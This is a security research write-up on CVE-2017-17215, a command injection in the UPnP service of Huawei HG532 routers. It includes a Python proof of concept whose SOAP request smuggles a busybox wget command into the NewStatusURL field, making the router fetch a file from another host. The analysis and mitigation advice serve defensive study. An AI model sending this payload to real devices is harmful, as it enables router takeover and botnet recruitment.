Huawei HG532 Series Router Remote Command Execution Analyzation

Knownsec 404 team
4 min readMay 22, 2019

--

Author: Knownsec 404 Team
Date: Jan 22, 2018
Chinese version: https://paper.seebug.org/490/

Background

Huawei HG532 Series Router is a high-speed wireless router designed for household and small office customers. On Nov.27, Check Point researchers reported an RCE(remote command execution) vulnerability (CVE-2017–17215) related to Huawei HG532 Routers【1】.

Before being discovered and reported, this unnoticed Zero-Day vulnerability had already attracted numerous attacks on the Internet, and many exploit packages have already spread all over the world in many countries and regions. The delivered payload has been identified as OKIRU/SATORI, an updated variant of Mirai. The main function of this payload is to send elaborated UDP/TCP message so as to launch DDoS(Distributed Denial of Service) against targets, which is pretty simple.

On Nov.23, ZoomEye Network Detector System also had captured this payload.

Vulnerability Analyzation

Download Firmware

There is a public firmware, HG532e version, available on the Internet. Download link: 【2】

After downloading, directly using binwalk to extract it.

The target system is 32-bit, big-endian MIPS architecture.

Vulnerability Analyzation

According to the report of Check Point【1】, the vulnerability point of the RCE vulnerability is located in the UPnP service.

Universal Plug and Play (UPnP) is a set of networking protocols that permits networked devices, such as personal computers, printers, Internet gateways, Wi-Fi access points and mobile devices to seamlessly discover each other’s presence on the network and establish functional network services for data sharing, communications, and entertainment.

Directly analyzing the code-named “upnp”, responsible for UPnP service, with IDA pro and utilizing the string, “NewStatusURL”, to locate the vulnerability point.

Keeping track of the cross-referenced data

The vulnerability shows as below:

The definition of the function ATP_XML_GetChildNodeByName as below:

Firstly, this program did the parse of SOAP XML message and received the value of two elements, NewDownloadURL and NewStatusURL.

Then, this program did the following joint and called system() function to execute finally.

snprintf($s0, 0x400, 'upg -g -U %s -t '1 Firmware Upgrade Image' -c upnp -r %s -d -', NewDownloadURL, NewStatusURL)system($s0)

upg is one upgrade program for routers and its parameters are as follows.

Now, we have two points to execute command injection, one is NewDownloadURL and the other is NewStatusURL.

Vulnerability verification

The target system provides the following commands.

Utilizing wget command to test the vulnerability. Sending the following message.

import requestsheaders = {
"Authorization": "Digest username=dslf-config, realm=HuaweiHomeGateway, nonce=88645cefb1f9ede0e336e3569d75ee30, uri=/ctrlt/DeviceUpgrade_1, response=3612f843a42db38f48f59d2a3597e19c, algorithm=MD5, qop=auth, nc=00000001, cnonce=248d1a2560100669"
}
data = '''<?xml version="1.0" ?>
<s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
<s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1">
<NewStatusURL>;/bin/busybox wget -g 192.168.1.2 -l /tmp/1 -r /1;</NewStatusURL>
<NewDownloadURL>HUAWEIUPNP</NewDownloadURL>
</u:Upgrade>
</s:Body>
</s:Envelope>
'''
requests.post('http://192.168.1.1:37215/ctrlt/DeviceUpgrade_1',headers=headers,data=data)

As you see, we receive the request on the listened port successfully.

It is worth mentioning that the UPnP service and firewall of HG532e routers are enabled by default. The default level of the firewall is low.

Under default configurations, any access to 37215 port though WAN will be intercepted, leading the defeat of vulnerability exploitation.

Protection scheme

On Nor.30, the Huawei released the security notice【4】 and verified this vulnerability.

The notice mentioned the following measures to mitigate the situations.

  • Configure the built-in firewall function.
  • Change the default password.
  • Deploy a firewall at the carrier side.

Due to the absence of the firmware upgrade packages, there is no patches analyzation.

Conclusion

  1. Similar to the command injection in SetNTPServers, Broadband Routers in Ireland【3】, this vulnerability seems to be a simple concatenation of command.
  2. This vulnerability also provides a good direction for researchers when discovering vulnerabilities. Pay more attention to the code near the functions like snprintf() and system().
  3. Any variations which can access to functions are detrimental. Most RCE vulnerabilities happen with the lack of filtration, leading to the command concatenation, or without suitable control for the length of variations, causing the buffer overflow. In term of this point, equipment supplier is supposed to undertake the responsibility. It is important to develop software with security awareness.

Reference link

【1】: Check Point vulnerability report
https://research.checkpoint.com/good-zero-day-skiddie/
【2】: HG532e firmware download link
https://ia601506.us.archive.org/22/items/RouterHG532e/router%20HG532e.rar
【3】: Eir’s D1000 Modem Is Wide Open To Being Hacked.
https://www.seebug.org/vuldb/ssvid-97024
【4】: Huawei’s Security Notice
http://www.huawei.com/en/psirt/security-notices/huawei-sn-20171130-01-hg532-en

--

--

Knownsec 404 team

404 Team, the core team from a well-known security company Knowsec in China. Twitter:@seebug_team Youtube: @404team knownsec Email:zoomeye@knownsec.com